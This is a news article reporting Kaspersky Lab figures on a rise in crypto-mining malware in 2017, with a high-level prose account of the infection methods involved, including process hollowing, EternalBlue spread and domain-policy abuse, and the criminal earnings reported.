Last year saw a 50% increase in crypto-mining malware attacks, with some hacking groups earning millions, according to new research from Kaspersky Lab.
The Russian AV firm claimed that 2.7m users were attacked with malicious miners in 2017, up from 1.9m in 2016.
The threat is typically spread via potentially unwanted application (PUA) partner programs, or scripts such as Coinhive being executed in the browser. Kaspersky Lab claimed to have blocked the latter 70 million times for customers in 2017.
However, the vendor claimed that cyber-criminals are increasingly lifting tactics from the targeted attack playbook, such as process hollowing.
“A victim may have just wanted to download a legitimate application, but instead they downloaded a PUA with a miner installer inside. This miner installer drops the legitimate Windows utility msiexec with a random name, which downloads and executes a malicious module from the remote server,” Kaspersky explained in a blog post.
“In the next step, it installs a malicious scheduler task which drops the miner’s body. This body executes the legitimate system process and uses a process-hollowing technique (legitimate process code is changed to malicious). Also, a special flag, system critical flag, is set to this new process. If a victim tries to kill this process, the Windows system will reboot. So, it is a challenge for security solutions to deal with such malicious behavior and detect the threat properly.”
Some groups are also targeting organizations to tap their greater computing power. Wannamine was spread through internal networks using an EternalBlue exploit, earning 9000 Monero ($2m) for its authors.
In another attack, hackers apparently infiltrated a corporate network, accessed the domain controller and were then able to use domain policies to execute a malicious PowerShell script on each corporate endpoint.
Crypto-mining botnets have earned cyber-criminals $7m in the second half of 2017 alone, with one group making $5m mining Electroneum coins, Kaspersky Lab claimed.
A report from Cisco earlier this year said that cyber-criminals are increasingly eschewing ransomware in favor of more lucrative crypto-mining campaigns, claiming it could earn them as much as $100m per year.